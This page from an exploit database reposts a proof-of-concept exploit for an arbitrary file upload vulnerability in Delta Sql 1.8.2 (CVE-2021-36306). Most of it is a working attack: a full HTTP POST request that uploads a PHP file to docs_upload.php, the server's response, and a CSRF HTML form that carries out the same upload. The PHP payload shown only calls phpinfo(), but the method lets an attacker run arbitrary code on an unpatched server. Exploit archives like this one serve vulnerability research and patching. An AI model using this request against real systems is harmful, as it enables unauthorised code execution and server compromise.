Delta Sql 1.8.2 - Arbitrary File Upload
CVE
Category
Price
Severity
CVE-2021-36306
CWE-434
$300
High
Author
Risk
Exploitation Type
Date
Unknown
High
Remote
2018-12-24
CVSS vector description
Metric
Value
Metric Description
Value Description
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018120213 Below is a copy:
Delta Sql 1.8.2 - Arbitrary File Upload Exploit Title: Delta Sql 1.8.2 - Arbitrary File Upload
Exploit Author: DunnyWhizzBang
Vendor Homepage: http://deltasql.sourceforge.net/
Software Link: https://sourceforge.net/projects/deltasql/files/latest/download
Software Link: http://deltasql.sourceforge.net/deltasql/
Tested on:windows7 x64/KaLiLinuX_x64
POC:
1)
http://localhost/[PATH]/docs_manage.php?id=1
http://localhost/[PATH]/upload/[FILE]
POST /[PATH]/docs_upload.php HTTP/1.1
Host: TARGET
User-Agent: Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/[PATH]/docs_manage.php?id=1
Cookie: PHPSESSID=ra5c0bgati64a01fag01l8hhf0
Connection: keep-alive
Content-Type: multipart/form-data; boundary=
---------------------------158943328914318561992147220435
Content-Length: 721
-----------------------------158943328914318561992147220435
Content-Disposition: form-data; name="fileToUpload"; filename="Efe.php"
Content-Type: application/force-download
<?php
phpinfo();
?>
-----------------------------158943328914318561992147220435
Content-Disposition: form-data; name="submit"
Upload File
-----------------------------158943328914318561992147220435
Content-Disposition: form-data; name="id"
1
-----------------------------158943328914318561992147220435
Content-Disposition: form-data; name="version"
-----------------------------158943328914318561992147220435
Content-Disposition: form-data; name="hasdocs"
-----------------------------158943328914318561992147220435--
HTTP/1.1 200 OK
Date: Thu, 24 Oct 2018 00:24:27 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 1783
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
########## CSRF EXPLOITATION ##################
<html>
<body>
<form action="http://localhost/[PATH]/docs_upload.php" method="post" enctype="multipart/form-data">
Select document to upload:
<input name="fileToUpload" id="fileToUpload" type="file">
<input value="Ver Ayari" name="submit" type="submit">
<input value="1" name="id" type="hidden">
<input value="1'" name="version" type="hidden">
<input value="1" name="hasdocs" type="hidden">
</form>
</body>
</html>
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum